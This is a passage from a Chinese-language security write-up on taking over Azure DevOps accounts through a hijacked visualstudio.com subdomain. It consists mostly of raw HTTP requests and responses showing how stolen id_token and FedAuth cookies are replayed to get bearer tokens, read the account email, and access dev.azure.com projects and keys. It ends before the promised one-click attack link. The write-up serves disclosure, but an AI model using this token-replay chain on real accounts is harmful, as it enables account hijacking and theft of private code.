主页 > 网络知识 > 通过域名劫持实现Azure DevOps账户劫持(2)

通过域名劫持实现Azure DevOps账户劫持(2)

则在我们控制的域名端arec.project-cascade.visualstudio.com后台,就会自动发起针对app.vsaex.visualstudio.com的一个POST请求,还会接收到受害者访问app.vsaex.visualstudio.com的另一个身份校验token信息,如下:

POST /_signedin?realm=arec.project-cascade.visualstudio.com&protocol=&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F HTTP/1.1 Host: arec.project-cascade.visualstudio.com Content-Length: 4634 Referer: https://arec.vssps.visualstudio.com/_signedin?realm=arec.project-cascade.visualstudio.com&protocol=&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F Cookie: ...omitted for brevity... id_token=<snip>&FedAuth=<snip>&FedAuth1=<snip>

 

通过域名劫持实现Azure DevOps账户劫持

 

漏洞利用

利用上述后续获得的身份校验token,我们可以发起针对vsaex.visualstudio.com, dev.azure.com and vssps.dev.azure.com等合法域名的身份验证,形成有效登录,实现对这些账户的身份劫持。如以劫持app.vsaex.visualstudio.com账户为例,携带上述窃取token发起身份校验请求:

POST /_apis/WebPlatformAuth/SessionToken HTTP/1.1 Host: app.vsaex.visualstudio.com Connection: close Content-Length: 105 Origin: https://app.vsaex.visualstudio.com X-VSS-ReauthenticationAction: Suppress Content-Type: application/json Accept: application/json;api-version=6.0-preview.1;excludeUrls=true X-Requested-With: XMLHttpRequest ...omitted for brevity... Cookie: UserAuthentication=<snipped id_token>; FedAuth=<snipped FedAuth>; FedAuth1=<snipped> {"appId":"00000000-0000-0000-0000-000000000000","force":false,"tokenType":0,"namedTokenId":"Aex.Profile"}

之后,服务端会响应回另一个app.vsaex.visualstudio.com分配的用户有效token:

HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Content-Length: 933 Content-Type: application/json; charset=utf-8; api-version=6.0-preview.1 ...omitted for brevity... {"appId":"00000000-0000-0000-0000-000000000000","token":"<snip>","tokenType":"session","validTo":"2020-05-12T06:45:47.2007474Z","namedTokenId":"Aex.Profile"}

利用该token,可以在app.vsaex.visualstudio.com中执行用户邮件获取,请求:

GET /_apis/User/User HTTP/1.1 Host: app.vsaex.visualstudio.com Connection: close X-TFS-FedAuthRedirect: Suppress X-VSS-ReauthenticationAction: Suppress X-Requested-With: XMLHttpRequest Accept-Language: en-US Authorization: Bearer <snip just recieved bearer token> Accept: application/json;api-version=6.0-preview.1;excludeUrls=true User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 X-TFS-Session: ab1e4b56-599c-4ab6-9f5e-756c486a0f2b Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Referer: https://app.vsaex.visualstudio.com/me?mkt=en-US Accept-Encoding: gzip, deflate

响应:

HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 258 ...omitted for brevity... {"descriptor":"msa.NTg0Zjc4NDAtYzc5ZC03MWU0LWJkN2ItMDZhY2Y1N2Q2OTA1","displayName":"s","mail":"<account_email>","unconfirmedMail":null,"country":"AU","dateCreated":"2018-05-25T23:19:53.6843383+00:00","lastModified":"2019-01-06T15:43:50.2963651+00:00","revision":0}

同时,利用该窃取token,还能通过链接https://app.vsaex.visualstudio.com/me?mkt=en-US访问用户关联在dev.azure.com上的一些开发项目:

 

通过域名劫持实现Azure DevOps账户劫持

 

且最终能访问获取到用户托管在dev.azure.com上的项目资源。请求:

GET /seanyeoh/_usersSettings/keys?__rt=fps&__ver=2 HTTP/1.1 Host: dev.azure.com Connection: close x-tfs-fedauthredirect: Suppress Origin: https://dev.azure.com x-vss-reauthenticationaction: Suppress authorization: Bearer <snip> accept: application/json;api-version=5.0-preview.1;excludeUrls=true;enumsAsNumbers=true;msDateFormat=true;noArrayWrap=true User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9

 

通过域名劫持实现Azure DevOps账户劫持

 

危害影响

恶意攻击者可以构造以下链接,发送给无意受害者,实现对受害者账户的一键点击劫持:

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!